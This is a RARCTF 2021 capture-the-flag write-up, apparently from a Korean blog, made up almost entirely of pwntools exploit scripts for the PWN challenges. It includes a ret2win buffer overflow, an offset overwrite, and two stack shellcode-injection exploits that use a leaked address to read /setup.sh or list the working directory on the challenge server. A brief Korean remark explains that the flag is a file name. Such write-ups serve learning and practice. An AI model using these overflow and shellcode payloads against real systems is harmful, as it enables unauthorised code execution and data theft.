RARCTF 2021

PWN

from pwn import *

p = remote('193.57.159.27', 43092)
code =0x404068

p.sendlineafter('no]:', 'yes')
payload = b""
payload += b"fffffffffff04068"
p.sendlineafter('shoot?\n', payload)
p.interactive()

 

from pwn import *

#p = process('./ret2winrars')
p = remote('193.57.159.27', 30527)
flag = 0x401166

payload = "A"*0x28
payload += p64(flag)

p.sendlineafter(b'access:', payload)
p.interactive()

 

 

 

제일 삽질한 문제

파일 이름이 플래그 이며, setup.sh를 보거나 디렉터리 전체를 출력하는 코드를 사용하여 볼 수 있음

from pwn import *

p = remote('193.57.159.27',35316)
#p = process('./notsimple')
e = ELF('./notsimple')
context(arch='amd64', log_level='DEBUG')
#gdb.attach(p)
p.recvuntil('leaking! ')
leak_addr = int(p.recvline()[:-1], 16)
print('leak_addr: ' + hex(leak_addr))

shellcode = shellcraft.open('/setup.sh')
shellcode += shellcraft.read('rax', 'rsp', 10000)
shellcode += shellcraft.write('1', 'rsp', 10000)
shellcode += shellcraft.exit()

shellcode = asm(shellcode)
payload = shellcode
payload += "\x90"*(88-len(shellcode))
payload += p64(leak_addr)
#payload += shellcode

p.sendlineafter('> ', payload)
#raw_input()
p.interactive()

from pwn import *
import os
p = remote('193.57.159.27',35316)
context(arch='amd64', log_level='DEBUG')
p.recvuntil('leaking! ')
leak_addr = int(p.recvline()[:-1], 16)
print('leak_addr: ' + hex(leak_addr))

shellcode = asm('mov rsp, QWORD PTR fs:[0]')
shellcode += asm(shellcraft.open('.'))
shellcode += asm(shellcraft.getdents(3, 'rsp', 0x500))
shellcode += asm(shellcraft.write(1, 'rsp', 0x500))

payload = shellcode
payload += "\x90"*(88-len(shellcode))
payload += p64(leak_addr)
#payload += shellcode

p.sendlineafter('> ', payload)
#raw_input()
p.interactive()